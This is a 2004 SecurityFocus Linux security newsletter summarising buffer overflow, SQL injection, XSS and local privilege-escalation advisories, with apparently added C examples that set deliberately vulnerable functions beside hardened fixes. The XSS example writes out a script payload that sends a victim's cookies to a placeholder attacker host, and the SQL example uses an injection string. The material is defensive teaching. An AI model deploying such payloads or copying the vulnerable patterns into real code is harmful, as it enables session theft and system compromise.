Date: Mon, 5 Jan 2004 15:20:43 -0700 (MST)
From: "John Boletta" <jboletta@securityfocus.com>
To: linux-secnews@securityfocus.com
Subject: SecurityFocus Linux Newsletter #165

SecurityFocus Linux Newsletter #165
------------------------------------
This Issue Sponsored by: RSA Conference 2004

Network with over 10,000 of the brightest minds in information security
at the largest, most highly-anticipated industry event of the year. Don't
miss RSA Conference 2004! Choose from over 200 class sessions and see
demos from more than 250 industry vendors. If your job touches security,
you need to be here. Learn more or register at:
http://www.securityfocus.com/sponsor/RSA_linux-secnews_031117 and use
priority code SF4.

------------------------------------------------------------------------

I. FRONT AND CENTER
     1. Checklist for Deploying an IDS
II. LINUX VULNERABILITY SUMMARY
     1. Surfboard httpd Remote Buffer Overflow Vulnerability
     2. OpenBB Index.PHP Remote SQL Injection Vulnerability
     3. OpenBB Board.PHP Cross-Site Scripting Vulnerability
     4. MiniBB Profile Website Name HTML Injection Vulnerability
     5. phpBB GroupCP.PHP SQL Injection Vulnerability
     6. John Sage ACK_hole01 Potential Remote Heap Buffer Overrun Vu...
     7. PHPCatalog ID Parameter SQL Injection Vulnerability
     8. XSOK GunZip Path Environment Variable Local Command Executio...
III. LINUX FOCUS LIST SUMMARY
     1. skey not updating for one time passwords (Thread)
     2. UNIX Authentication (Thread)
IV. NEW PRODUCTS FOR LINUX PLATFORMS
     1. Immunity CANVAS
     2. SecretAgent
     3. Cyber-Ark  Inter-Business Vault
     4. EnCase Forensic Edition
     5. KeyGhost SX
     6. SafeKit
V. NEW TOOLS FOR LINUX PLATFORMS
     1. GNUnet v0.6.1a
     2. Yin Yang  v1.0
     3. Quick Spam Filter v0.9.12
     4. System Garden Habitat  v0.17.5
     5. Portfwd v0.26
     6. Helios qmail   v0.6.1
VI. UNSUBSCRIBE INSTRUCTIONS
VII. SPONSOR INFORMATION


I. FRONT AND CENTER
-------------------
1. Checklist for Deploying an IDS
By Andy Cuff

The scope of this article considers the worst case scenario, that of
deploying a Network IDS on a remote network (target). The introduction
of an IDS into an organization's network can be sensitive and often has
political implications with the network staff, and thus a checklist
written from the perspective of an outside consultant (even if the IDS
is deployed internally) that appeases all parties can be useful to
ensure a successful implementation.

http://www.securityfocus.com/infocus/1754


II. LINUX VULNERABILITY SUMMARY
-------------------------------
1. Surfboard httpd Remote Buffer Overflow Vulnerability
BugTraq ID: 9299
Remote: Yes
Date Published: Dec 26 2003
Relevant URL: http://www.securityfocus.com/bid/9299
Summary:
Surfboard is a freely available web server implementation for
Unix/Linux variants.

A vulnerability has been identified in the Surfboard web server's
handling of certain URL requests. Because of this, it may be possible
for a remote attacker to gain unauthorized access to a system running
the vulnerable software. The condition is present due to insufficient
boundary checking.

The issue presents itself when an attacker sends a specially crafted
URL request of more than 1024 characters to the server daemon. The
immediate consequence of an attack may be a crash of the daemon,
resulting in a denial of service condition.

An attacker may leverage the issue by exploiting the unbounded memory
copy operation to overwrite the saved return address/base pointer,
causing the affected procedure to return to an address of their choice.
Successful exploitation of this issue may allow an attacker to execute
arbitrary code in the context of the vulnerable software in order to
gain unauthorized access; however, this has not been confirmed at the
moment.

Surfboard version 1.1.9 has been reported to be prone to this issue;
however, other versions may be affected as well.
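The unbounded copy described above, shown as an added C illustration rather than Surfboard's own code: a fixed 1024-byte stack buffer filled by strcpy() next to a variant that refuses request paths that cannot fit. The function names, the 1024-byte buffer, and the 2048-byte attacker URL are assumptions made for the demonstration; nothing here is taken from the Surfboard source.

```c
#include <stdio.h>
#include <string.h>

#define URL_BUF 1024   /* assumed buffer size, matching the 1024-char trigger */

/* Vulnerable pattern: strcpy() does not know how large 'buf' is. A request
 * path of 1024 or more bytes runs past the array and over the saved frame
 * pointer and return address stored above it. Kept for comparison only;
 * never call it with untrusted input. */
int handle_url_unsafe(const char *url)
{
    char buf[URL_BUF];
    strcpy(buf, url);                  /* unbounded copy */
    return (int)strlen(buf);
}

/* Hardened: establish that the path (plus its NUL) fits before a single
 * byte is written to the stack buffer, and never scan past the limit.
 * Returns the path length, or -1 when the request is too long; a real
 * server would answer 414 Request-URI Too Long and close the connection. */
int handle_url_safe(const char *url)
{
    char buf[URL_BUF];
    size_t len = 0;
    while (len < URL_BUF && url[len] != '\0')   /* looks at most 1024 bytes */
        len++;
    if (len == URL_BUF)
        return -1;                     /* no terminator within the limit */
    memcpy(buf, url, len + 1);         /* bounded copy including the NUL */
    return (int)len;
}

/* Builds the attacker's oversized request path: 'n' copies of 'A'. The
 * caller supplies at least n + 1 bytes in 'out'. */
void make_long_url(char *out, size_t n)
{
    memset(out, 'A', n);
    out[n] = '\0';
}

int main(void)
{
    static char url[2048 + 1];
    make_long_url(url, 2048);
    printf("/index.html -> %d\n", handle_url_safe("/index.html"));
    printf("2048 x 'A'  -> %d\n", handle_url_safe(url));
    /* handle_url_unsafe(url) would smash the stack here; it is not run. */
    return 0;
}
```

The oversized path is only ever handed to the bounded variant: calling handle_url_unsafe() with it would overwrite the saved frame pointer and return address (or trip a stack protector and abort), which is precisely the condition the advisory describes.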

2. OpenBB Index.PHP Remote SQL Injection Vulnerability
BugTraq ID: 9300
Remote: Yes
Date Published: Dec 26 2003
Relevant URL: http://www.securityfocus.com/bid/9300
Summary:
OpenBB is a freely available, open source bulletin board software
package. It is available for Unix, Linux, and Microsoft Windows
operating systems.

A problem with the software may make it possible for remote users to
modify database query logic.

It has been reported that OpenBB does not properly check input passed
via the 'CID' parameter of the 'index.php' script. Because of this, it
may be possible for a remote user to inject arbitrary SQL into queries
executed in the context of the database user for the bulletin board
software. The consequences of successful exploitation will vary
depending on the underlying database implementation, but may allow for
disclosure of sensitive information such as administrator passwords or
remote compromise of the bulletin board or database itself.

OpenBB 1.06 has been reported to be prone to this issue; however, other
versions could be affected as well.

This issue may be related to BID 7401.

3. OpenBB Board.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 9303
Remote: Yes
Date Published: Dec 27 2003
Relevant URL: http://www.securityfocus.com/bid/9303
Summary:
OpenBB is a freely available, open source bulletin board software
package. It is available for Unix, Linux, and Microsoft Windows
operating systems.

OpenBB is prone to a cross-site scripting vulnerability in the
'board.php' script. The source of the problem is that HTML and script
code are not adequately sanitized from input supplied via the 'FID' URI
parameter. This input is included in dynamically generated web pages. A
remote attacker could exploit this issue by embedding hostile HTML and
script code in a malicious link to the vulnerable script. The
attacker-supplied code will be rendered in the browser of an
unsuspecting user who follows the link, and will execute in the security
context of the site hosting the vulnerable software.

Exploitation could allow for theft of cookie-based authentication
credentials. Other attacks are also possible.

It should be noted that although this vulnerability has been reported
to affect OpenBB 1.06, other versions might also be affected.

4. MiniBB Profile Website Name HTML Injection Vulnerability
BugTraq ID: 9310
Remote: Yes
Date Published: Dec 29 2003
Relevant URL: http://www.securityfocus.com/bid/9310
Summary:
miniBB is web forum software. It is written in PHP and will run on most
Unix and Linux variants as well as Microsoft Windows operating systems.

miniBB is prone to an HTML injection vulnerability. The vulnerability
exists in the 'bb_edit_prf.php' script but is exposed via the
'bb_func_usernfo.php' script, which provides the interface for editing
user profiles. The source of the issue is that 'bb_func_usernfo.php'
does not sufficiently sanitize input supplied via the 'website name'
field of user profiles. This issue could permit registered users to
inject hostile HTML and script code into the 'website name' field of
their user profile, which would be rendered by other web users when the
user profile is viewed.

This could be exploited to steal cookie-based authentication
credentials. It is also possible to use this type of vulnerability as an
attack vector to exploit latent browser security flaws.
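An added C example covering both the reflected 'FID' parameter in OpenBB (item 3) and the stored 'website name' field in miniBB (item 4); it is not code from either project. The fix for both is the same: encode user data at the moment it is written into HTML. The escaper, the anchor markup, the function names, and the cookie-stealing payload (with a placeholder host) are assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Replaces the five characters that let user data break out of an HTML text
 * node or a quoted attribute. Returns the escaped length, or -1 when 'out'
 * (size n) cannot hold the result; on success 'out' is NUL-terminated. */
int html_escape(const char *in, char *out, size_t n)
{
    size_t o = 0;
    for (; *in != '\0'; in++) {
        const char *rep = NULL;
        size_t need;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   break;
        }
        need = rep ? strlen(rep) : 1;
        if (o + need >= n)
            return -1;                 /* keep room for the terminator */
        if (rep)
            memcpy(out + o, rep, need);
        else
            out[o] = *in;
        o += need;
    }
    out[o] = '\0';
    return (int)o;
}

/* Renders the profile's "website name" (or any reflected parameter) into a
 * page fragment the way a forum template would. escape == 0 reproduces the
 * vulnerable behaviour; escape == 1 is the fix: encode at output time. */
int render_website_name(const char *name, int escape, char *out, size_t n)
{
    char safe[512];
    const char *text = name;
    int w;
    if (escape) {
        if (html_escape(name, safe, sizeof safe) < 0)
            return -1;
        text = safe;
    }
    w = snprintf(out, n, "<a href=\"#\">%s</a>", text);
    return (w >= 0 && (size_t)w < n) ? 0 : -1;
}

/* Constructed attacker value: a script that ships the viewer's cookie to a
 * host the attacker controls (placeholder name, not a real site). */
static const char *PAYLOAD =
    "<script>new Image().src='http://attacker.example/?'+document.cookie</script>";

int main(void)
{
    char page[1024];
    render_website_name(PAYLOAD, 0, page, sizeof page);
    printf("vulnerable: %s\n", page);
    render_website_name(PAYLOAD, 1, page, sizeof page);
    printf("escaped:    %s\n", page);
    return 0;
}
```

Escaping at output rather than on input is what makes the same routine serve both cases: the OpenBB value arrives in the URL and is echoed straight back, while the miniBB value is stored and rendered later for every visitor, but each reaches the page through a template that can call the escaper.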

5. phpBB GroupCP.PHP SQL Injection Vulnerability
BugTraq ID: 9314
Remote: Yes
Date Published: Dec 29 2003
Relevant URL: http://www.securityfocus.com/bid/9314
Summary:
phpBB is an open-source web forum application that is written in PHP
and supported by a number of database products. It will run on most
Unix and Linux variants, as well as Microsoft Windows operating systems.

A vulnerability has been reported to exist in the software that may
allow a remote user who has group moderator privileges to inject
malicious SQL syntax into database queries. The problem reportedly
exists in the $sql_in parameter of the groupcp.php script. This issue is
caused by insufficient sanitization of user-supplied data. A remote
attacker may exploit this issue to influence SQL query logic to have
unauthorized SQL queries executed in the database.

A malicious user may influence database queries in order to view or
modify sensitive information, potentially compromising the software or
the database.

6. John Sage ACK_hole01 Potential Remote Heap Buffer Overrun Vu...
BugTraq ID: 9315
Remote: Yes
Date Published: Dec 28 2003
Relevant URL: http://www.securityfocus.com/bid/9315
Summary:
John Sage ACK_hole01 is a TCP/IP network data sink for Unix and Linux
platforms.

ACK_hole01 has been reported prone to a remote heap overrun
vulnerability. The issue presents itself because the size_t integer
variable 'bytes', used to limit the data that is read into a heap based
buffer by a read() call, is not properly initialized. As a result of
this flaw, the 'bytes' variable holds whatever stale data happened to be
in its stack slot. When this variable is later used as the count
argument for a read() call, excessive attacker-supplied data may be read
from a network socket descriptor into a reserved buffer in the heap.

Because of the nature of this issue, the vulnerability may only present
itself if the 'bytes' integer contains a sufficiently large value, so
that the data read exceeds the size of the reserved buffer. An attacker
may potentially exploit this issue to corrupt inline heap memory
management chunk headers that are adjacent to the affected buffer.
Exploitation of the issue may be hindered because free() is not called
on an affected adjacent chunk; this, however, has not been confirmed, as
other heap exploitation vectors may be plausible.
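The uninitialised read() count described above, as an added C illustration (not ACK_hole01's code): the unsafe shape beside a version whose count is tied to the allocation and which drains a large send in bounded pieces, driven through a pipe that stands in for the TCP socket. The 64-byte buffer, the function names and the 1000-byte payload are assumptions for the demonstration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define SINK_BUF 64   /* assumed size of the heap buffer in this illustration */

/* Vulnerable shape: 'bytes' is declared but never assigned, so read() is
 * handed whatever the stack slot happened to contain. If that stale value
 * exceeds SINK_BUF, the peer's data runs past the malloc()ed chunk into the
 * next chunk's inline header. Compiled for comparison, never called. */
ssize_t sink_unsafe(int fd)
{
    char *buf = malloc(SINK_BUF);
    size_t bytes;                      /* uninitialised count */
    ssize_t n;
    if (buf == NULL)
        return -1;
    n = read(fd, buf, bytes);          /* count is stack garbage */
    free(buf);
    return n;
}

/* Hardened: the count is the allocation size, and the read loops so that a
 * large send is drained in SINK_BUF-sized pieces. Returns the total number
 * of bytes drained (or -1 on a read error); '*peak' receives the largest
 * single read, which by construction never exceeds SINK_BUF. */
ssize_t sink_safe(int fd, size_t *peak)
{
    char *buf = malloc(SINK_BUF);
    ssize_t total = 0, n;
    if (buf == NULL)
        return -1;
    *peak = 0;
    while ((n = read(fd, buf, SINK_BUF)) > 0) {   /* bounded by the allocation */
        if ((size_t)n > *peak)
            *peak = (size_t)n;
        total += n;
    }
    free(buf);
    return n < 0 ? -1 : total;
}

/* Stands in for the remote peer: writes 'len' bytes of 'A' into a pipe that
 * plays the role of the TCP socket and returns the read end. 'len' is kept
 * well below the pipe capacity so the single write() completes. */
int attacker_fd(size_t len)
{
    int p[2];
    char *payload;
    if (pipe(p) != 0)
        return -1;
    payload = malloc(len);
    if (payload == NULL)
        return -1;
    memset(payload, 'A', len);
    if (write(p[1], payload, len) != (ssize_t)len)
        return -1;
    close(p[1]);                       /* reader sees EOF once drained */
    free(payload);
    return p[0];
}

int main(void)
{
    size_t peak = 0;
    int fd = attacker_fd(1000);
    ssize_t got = sink_safe(fd, &peak);
    printf("drained %ld bytes, largest single read %lu (limit %d)\n",
           (long)got, (unsigned long)peak, SINK_BUF);
    close(fd);
    return 0;
}
```

The point of the loop is that a 1000-byte send never becomes a 1000-byte read: the count passed to read() is the same constant used for malloc(), so no single call can write past the chunk, whatever the peer sends.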

7. PHPCatalog ID Parameter SQL Injection Vulnerability
BugTraq ID: 9318
Remote: Yes
Date Published: Dec 29 2003
Relevant URL: http://www.securityfocus.com/bid/9318
Summary:
PHPCatalog is expandable web based e-catalog software implemented in
PHP. It will run on most Unix and Linux variants, as well as Microsoft
Windows operating systems.

A vulnerability has been reported to exist in the software that may
allow a remote user to inject malicious SQL syntax into database
queries. The problem reportedly exists in the $id parameter of
PHPCatalog. This issue is caused by insufficient sanitization of
user-supplied data supplied as input to this parameter, which will then
be included in a database query. A remote attacker may exploit this
issue to influence SQL query logic to have unauthorized SQL queries
executed in the database.

A malicious user may influence database queries in order to view or
modify sensitive information, potentially compromising the software or
the database.

This vulnerability has been reported to affect PHPCatalog version 2.6.7
and prior versions.
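An added C example that serves the three SQL injection items above (OpenBB 'CID', phpBB '$sql_in', PHPCatalog '$id'); it is not code from any of those projects. The first function shows the raw interpolation that lets a payload rewrite the query; the rest apply the check those scripts lacked: accept only a strictly decimal identifier, or a list of them, before the value is placed in SQL. The query text, the function names, and the assumed "1,2,3" shape of $sql_in are illustrative assumptions; where the database layer offers prepared statements they should be used as well.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable shape (constructed): the request parameter is pasted into the
 * SQL text exactly as received. */
int category_query_unsafe(const char *cid, char *out, size_t n)
{
    int w = snprintf(out, n, "SELECT * FROM categories WHERE cid = %s", cid);
    return (w >= 0 && (size_t)w < n) ? 0 : -1;
}

/* Strict identifier parse: ASCII digits only, the whole string consumed,
 * no sign, no leading whitespace (strtol would silently skip it), no
 * overflow. Returns 0 and stores the value, or -1. */
int parse_id(const char *s, long *id)
{
    char *end;
    long v;
    if (s == NULL || *s < '0' || *s > '9')
        return -1;                     /* also rejects "", "-1", " 1" */
    errno = 0;
    v = strtol(s, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return -1;                     /* overflow, or trailing " OR 1=1" */
    *id = v;
    return 0;
}

/* Hardened single-ID query: the parameter reaches the SQL only as a number
 * that has already been validated. */
int category_query_safe(const char *cid, char *out, size_t n)
{
    long id;
    int w;
    if (parse_id(cid, &id) != 0)
        return -1;
    w = snprintf(out, n, "SELECT * FROM categories WHERE cid = %ld", id);
    return (w >= 0 && (size_t)w < n) ? 0 : -1;
}

/* The same check generalised to a list parameter destined for an IN (...)
 * clause, assuming the "1,2,3" shape. Every element must be a valid ID;
 * empty elements (",," or a trailing comma) are refused. Returns the number
 * of IDs stored in 'ids' (at most 'max'), or -1. */
int parse_id_list(const char *list, long *ids, size_t max)
{
    size_t count = 0;
    while (*list != '\0') {
        char item[32];
        const char *comma = strchr(list, ',');
        size_t len = comma ? (size_t)(comma - list) : strlen(list);
        if (len == 0 || len >= sizeof item || count == max)
            return -1;
        memcpy(item, list, len);
        item[len] = '\0';
        if (parse_id(item, &ids[count]) != 0)
            return -1;
        count++;
        if (comma == NULL)
            break;
        list = comma + 1;
        if (*list == '\0')
            return -1;                 /* trailing comma */
    }
    return (int)count;
}

int main(void)
{
    char q[128];
    long ids[8];
    category_query_unsafe("1 OR 1=1", q, sizeof q);
    printf("unsafe:  %s\n", q);
    printf("safe:    %s\n",
           category_query_safe("1 OR 1=1", q, sizeof q) == 0 ? q : "rejected");
    printf("id list: %d\n", parse_id_list("1,2,3", ids, 8));
    return 0;
}
```

A whitelist parse is stricter than quoting or escaping for a numeric column: there is nothing to escape once the value is known to be digits, and the common bypasses (a sign, leading whitespace, a second statement after a comment marker) all fail the same test.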

8. XSOK GunZip Path Environment Variable Local Command Executio...
BugTraq ID: 9321
Remote: No
Date Published: Dec 30 2003
Relevant URL: http://www.securityfocus.com/bid/9321
Summary:
xsok is a freely available, open source single player game.  It is
available for the Linux platform.

A problem has been disclosed in the handling of user-supplied input in
xsok. Because of this, a local attacker may be able to gain elevated
privileges on a host with the vulnerable program.

The problem is in the handling of the GUNZIP_PATH environment variable.
It is possible for an attacker to modify the environment variable,
allowing the attacker to change the search path that the program
follows to find the gunzip executable. Vulnerable versions of the
program do not drop privileges before executing the gunzip executable.
By altering the path and supplying a malicious program with the name
gunzip, attackers are able to execute arbitrary commands with the
privileges of the 'games' group ID.
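An added C example of the two decisions a set-group-ID game should make before running an external helper; it is not xsok's code. The trusted path /bin/gunzip, the function names, and the 'privileged' flag passed in explicitly (so the logic can be exercised from a process that is not setgid) are assumptions for the demonstration.

```c
#define _GNU_SOURCE          /* setresgid() on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Explicit prototype so the example builds even if feature macros were
 * evaluated before this file's define; the kernel call is the same. */
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

#define TRUSTED_GUNZIP "/bin/gunzip"   /* assumed install location */

/* Vulnerable shape (constructed): the directory to search comes straight
 * from the caller's environment, and the process still carries the
 * set-group-ID 'games' credential when it runs the result. */
int gunzip_command_unsafe(const char *env_gunzip_path, char *out, size_t n)
{
    const char *dir = env_gunzip_path ? env_gunzip_path : "/bin";
    int w = snprintf(out, n, "%s/gunzip", dir);
    return (w >= 0 && (size_t)w < n) ? 0 : -1;
}

/* True when the effective group differs from the real one, i.e. the binary
 * was started set-group-ID and the environment is not to be trusted. */
int running_setgid(void)
{
    return getgid() != getegid();
}

/* Give the extra group back before anything external runs. setgid() alone
 * leaves the saved set-group-ID in place on Linux, so a later setegid()
 * could win 'games' back; setresgid() clears all three, and the check
 * afterwards confirms that it stuck. */
int drop_privileges(void)
{
    gid_t real = getgid();
    if (setresgid(real, real, real) != 0)
        return -1;
    return getegid() == real ? 0 : -1;
}

/* Hardened choice of helper. 'privileged' is passed in explicitly (it would
 * be running_setgid() in the real program). The environment is honoured only
 * when there is nothing to gain from abusing it, and only if it names an
 * absolute directory; otherwise the fixed, trusted path is used. */
int choose_gunzip(const char *env_gunzip_path, int privileged,
                  char *out, size_t n)
{
    int w;
    if (privileged || env_gunzip_path == NULL || env_gunzip_path[0] != '/')
        w = snprintf(out, n, "%s", TRUSTED_GUNZIP);
    else
        w = snprintf(out, n, "%s/gunzip", env_gunzip_path);
    return (w >= 0 && (size_t)w < n) ? 0 : -1;
}

int main(void)
{
    char cmd[256];
    /* Order matters: shed the group first, then decide what to run. */
    if (drop_privileges() != 0)
        return 1;
    choose_gunzip(getenv("GUNZIP_PATH"), running_setgid(), cmd, sizeof cmd);
    printf("would exec: %s\n", cmd);
    return 0;
}
```

Either measure alone would have closed this particular hole; doing both is cheap, and the privilege drop also covers whatever gunzip itself does with its own environment (PATH, LD_PRELOAD and the like), which a fixed helper path does not.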


III. LINUX FOCUS LIST SUMMARY
-----------------------------
1. skey not updating for one time passwords (Thread)
Relevant URL: http://www.securityfocus.com/archive/91/348737

2. UNIX Authentication (Thread)
Relevant URL: http://www.securityfocus.com/archive/91/348629


IV. NEW PRODUCTS FOR LINUX PLATFORMS
------------------------------------
1. Immunity CANVAS
By: Immunity, Inc.
Platforms: Linux, Windows 2000
Relevant URL: http://www.immunitysec.com/CANVAS/
Summary:

Immunity CANVAS is 100% pure Python, and every license includes full
access to the entire CANVAS codebase. Python is one of the easiest
languages to learn, so even novice programmers can be productive on the
CANVAS API, should they so choose.

Immunity CANVAS is both a valuable demonstration tool for enterprise
information security teams or system administrators, and an advanced
development platform for exploit developers, or people learning to
become exploit developers.

2. SecretAgent
By: Information Security Corporation (ISC)
Platforms: Linux, MacOS, UNIX, Windows 2000, Windows 95/98, Windows NT,
Windows XP
Relevant URL: http://www.infoseccorp.com/products/secretagent/contents.htm
Summary:

SecretAgent is a file encryption and digital signature utility,
supporting cross-platform interoperability over a wide range of
platforms: Windows, Linux, Mac OS X, and UNIX systems.

It's the perfect solution for your data security requirements,
regardless of the size of your organization.

Using the latest recognized standards in encryption and digital
signature technology, SecretAgent ensures the confidentiality,
integrity, and authenticity of your data.

3. Cyber-Ark  Inter-Business Vault
By: Cyber-Ark
Platforms: Linux, Windows 2000, Windows NT, Windows XP
Relevant URL: http://www.cyber-ark.com/datasecuritysoftware/inter-business_vault.htm
Summary:

Based on Cyber-Ark Software's Vaulting Technology, the Inter-Business
Vault is an information security solution that enables organizations to
safely overcome traditional network boundaries in order to securely
share business information among customers, business partners, and
remote branches. It provides a seamless, LAN-like experience over the
Internet that includes all the security, performance, accessibility, and
ease of administration required to allow organizations to share
everyday information worldwide.

4. EnCase Forensic Edition
By: Guidance Software Inc.
Platforms: DOS, FreeBSD, Linux, MacOS, NetBSD, OpenBSD, PalmOS, 
Solaris,
UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.guidancesoftware.com/products/EnCaseForensic/index.shtm
Summary:

EnCase Forensic Edition Version 4 delivers the most advanced features
for computer forensics and investigations. With an intuitive GUI and
superior performance, EnCase Version 4 provides investigators with the
tools to conduct large-scale and complex investigations with accuracy
and efficiency. Guidance Software's award winning solution yields
completely non-invasive computer forensic investigations while allowing
examiners to easily manage large volumes of computer evidence and view
all relevant files, including "deleted" files, file slack and
unallocated space.

The integrated functionality of EnCase allows the examiner to perform
all functions of the computer forensic investigation process. EnCase's
EnScript, a powerful macro-programming language and API included within
EnCase, allows investigators to build customized and reusable forensic
scripts.

5. KeyGhost SX
By: KeyGhost Ltd
Platforms: BeOS, DOS, Linux, OS/2, Solaris, SunOS, Windows 2000, 
Windows
95/98, Windows NT, Windows XP
Relevant URL: http://www.keyghost.com/SX/
Summary:

KeyGhost SX discreetly captures and records all keystrokes typed,
including chat conversations, email, word processor, or even activity
within an accounting or specialist system. It is completely
undetectable by software scanners and provides you with one of the most
powerful stealth surveillance applications offered anywhere.

Because KeyGhost uses STRONG 128-Bit encryption to store the recorded
data in its own internal memory (not on the hard drive), it is
impossible for a network intruder to gain access to any sensitive data
stored within the device.

6. SafeKit
By: Evidian Inc.
Platforms: AIX, HP-UX, Linux, Solaris, Windows 2000
Relevant URL: http://www.evidian.com/safekit/index.htm
Summary:

Evidian's SafeKit technology makes it possible to render any
application available 24 hours per day. With no extra hardware: just
use your existing servers and install this software-only solution.

This provides ultimate scalability. As your needs grow, all you need to
do is add more standard servers into the cluster. With the load
balancing features of SafeKit, you can distribute applications over
multiple servers. If one system fails completely, the others will
continue to serve your users.


V. NEW TOOLS FOR LINUX PLATFORMS
--------------------------------
1. GNUnet v0.6.1a
By: Christian Grothoff
Relevant URL: http://www.ovmj.org/GNUnet/
Platforms: FreeBSD, Linux, NetBSD, OpenBSD, POSIX
Summary:

GNUnet is a peer-to-peer framework with a focus on providing security.
All link-to-link messages in the network are confidential and
authenticated. The framework provides a transport abstraction layer and
can currently encapsulate the peer-to-peer traffic in UDP, TCP, or SMTP
messages. GNUnet supports accounting to provide contributing nodes with
better service. The primary service built on top of the core GNUnet
framework is anonymous file sharing.

2. Yin Yang  v1.0
By: primac
Relevant URL: http://yinyang.sourceforge.net
Platforms: Linux
Summary:

Yin Yang is a real-time Linux file scanner that is activated whenever a
file is accessed. When a file opening system call is detected, it will
send the full pathname of the file to a network daemon. The network
daemon will then pass the pathname of the file to a file scanner, such
as an anti-virus scanner, and return the status. The status will then
be reported back to the network daemon, and the response will be passed
back to the system call. The default action logs a message to the system
logger. The file scanner is wrapped with the original file opening
system call, so it will open the file normally after the file scanning.

3. Quick Spam Filter v0.9.12
By: Andrew Wood
Relevant URL: http://www.ivarch.com/programs/qsf.shtml
Platforms: Linux, POSIX
Summary:

Quick Spam Filter is a small, fast spam filter that works by learning
to recognise the words that are more likely to appear in spam than
non-spam. It is intended to be used in a procmail recipe to mark email
as being possible spam.

4. System Garden Habitat  v0.17.5
By: Nigel Stuckey
Relevant URL: http://www.systemgarden.com/habitat
Platforms: Linux
Summary:

Habitat is a performance management system which captures, stores, and
visualises table-based time series data. Monitor probes exist for Linux
and Solaris with Windows coming soon. It has a command line interface,
a fast GUI client for graphical visualisation, and a simple format for
extending data capture in the agent. It is written in C with Gtk and
can access data from its peers directly, by file sharing, or with the
use of a separate central archiving repository (harvest) to scale to
installations of significant size.

5. Portfwd v0.26
By: Everton da Silva Marques, evertonm@my-deja.com
Relevant URL: http://sourceforge.net/projects/portfwd/
Platforms: FreeBSD, Linux, NetBSD, OpenBSD, Solaris
Summary:

Portfwd is a small C++ utility which forwards incoming TCP connections
and/or UDP packets to remote hosts. Multiple forwarders can be
specified in a flexible configuration file. There is support for FTP
forwarding.

6. Helios qmail   v0.6.1
By: Paul Foremski
Relevant URL: http://sourceforge.net/projects/helios-qmail/
Platforms: FreeBSD, Linux, NetBSD, OpenBSD, POSIX, UNIX
Summary:

Helios qmail is an advanced qmail distribution based on qmail-sql. It
supports SMTP, SMTPS, POP3, POP3S, IMAP, and IMAPS services. It also
features antivirus and antispam filters, antispoof, SMTP-AUTH,
SMTP-after-POP/IMAP, a PHP5 API, and many other useful tools.

VII. SPONSOR INFORMATION
------------------------
This Issue Sponsored by: RSA Conference 2004

Network with over 10,000 of the brightest minds in information security
at the largest, most highly-anticipated industry event of the year. Don't
miss RSA Conference 2004! Choose from over 200 class sessions and see
demos from more than 250 industry vendors. If your job touches security,
you need to be here. Learn more or register at:
http://www.securityfocus.com/sponsor/RSA_linux-secnews_031117 and use
priority code SF4.

------------------------------------------------------------------------